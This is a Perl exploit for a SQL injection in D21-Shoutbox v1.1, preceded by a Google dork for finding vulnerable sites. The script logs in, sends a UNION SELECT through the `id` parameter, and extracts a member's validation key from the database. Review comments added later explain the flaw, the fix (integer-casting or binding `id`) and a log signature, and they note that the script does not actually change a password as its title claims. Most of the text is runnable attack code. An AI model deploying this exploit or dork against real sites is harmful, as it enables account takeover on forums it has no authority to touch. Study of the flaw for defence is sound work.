D21-Shoutbox v1.1 Exploit Admin Password Change
Эксплоит:
google dork: "Powered By: D21-Shoutbox 1.1"
Эксплоит:
################################################
#!/usr/bin/perl #
# D21-Shoutbox v1.1 Exploit Admin Password Change #
# Author: Synsta #
# Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431 #
# Original Exploit Found by Windak & langtuhaohoa #
################################################
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;
# NOTE(review): proof-of-concept for a SQL injection in D21-Shoutbox v1.1.
# After logging in with an ordinary account, it sends one GET request whose
# `id` parameter carries a UNION SELECT, then searches the response for a
# 32-character key read from the `validating` table.  Despite the title, this
# listing only prints that key; nothing here changes a password.
# Defender view: the server side presumably places `id` into a query without
# forcing it to an integer (not visible here -- confirm against the
# application source).  Integer-casting or binding `id` as a parameter closes
# the hole, and requests with act=Shoutbox whose `id` is not purely numeric
# are the thing to look for in web-server logs.
# The listing does not enable strict or warnings, so %form, $post_pm_page and
# $rs below are undeclared package variables.
# variables
my $login_page = '?act=Login&CODE=01';
my $id = '';
my $table_fix = '';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
# $i and $j are declared but never used in this listing
my $i;
my $j;
# objects
my $ua = LWP::UserAgent->new;
# autosave is off, so session cookies are not written back to a file
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";
# get user input
print 'Shoutbox URL (ex: forumurl.com/forum): ';
chomp (my $base_url = <STDIN>);
print 'Your Username: ';
chomp (my $user = <STDIN>);
# %form is written here but never read anywhere else in this listing
$form{entered_name} = $user;
print 'Your Password: ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty; # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty; # to turn it back on
print "\n" if $stty;
print 'ID:'; # it'll say next to one of their posts
# redeclares $id in the same scope, masking the empty default set above
chomp (my $id = <STDIN>);
print 'Table prefix (ex: ibf_): ';
# redeclares $table_fix in the same scope, masking the empty default set above
chomp ( my $table_fix = <STDIN>);
# normalise the URL: prepend http:// if absent, and append '/' unless the
# URL already ends in '/' or index.php
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
# log in; the POST is repeated while the response is unsuccessful and $tries
# has not counted down to zero (up to six attempts with the initial value 5)
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
# unbuffer STDOUT so progress messages appear immediately
$| = 1;
print "\nAttempting to extract validation key from the database...\n ";
# The injected value travels in `id`: a UNION SELECT of `vid` from the
# prefixed `validating` table, ending in `/*` (presumably to comment out the
# remainder of the server's statement).  The table prefix and member id typed
# in above are concatenated in unchanged.  This request shape is what a
# WAF rule or log search should match on.
$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*";
# $post_pm_page is spelled differently from $pose_pm_page declared above and
# is never assigned in this listing, so it contributes an empty string here
$resp = $ua->get ($base_url . $post_pm_page . $sql );
# an unsuccessful response only prints "ERROR"; the script does not die here
if (!$resp->is_success()) {
print "ERROR";
}
else {
# prints an empty string (no visible effect)
print "" ;
#print $resp->content;
$rs=$resp->content;
# look for "uid=" followed by 32 characters from a-z, 0-9 or a literal comma
# (the comma inside the character class is matched literally)
if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "\nValidation Key: "; print $1;
print "\n \nAuthor: Synsta\n";
print "Website: w4ck1ng.com\n";
print "Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431\n";
}
# no match: dump the whole response body for manual inspection
else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}
}
# wait for Enter before exiting
<STDIN>;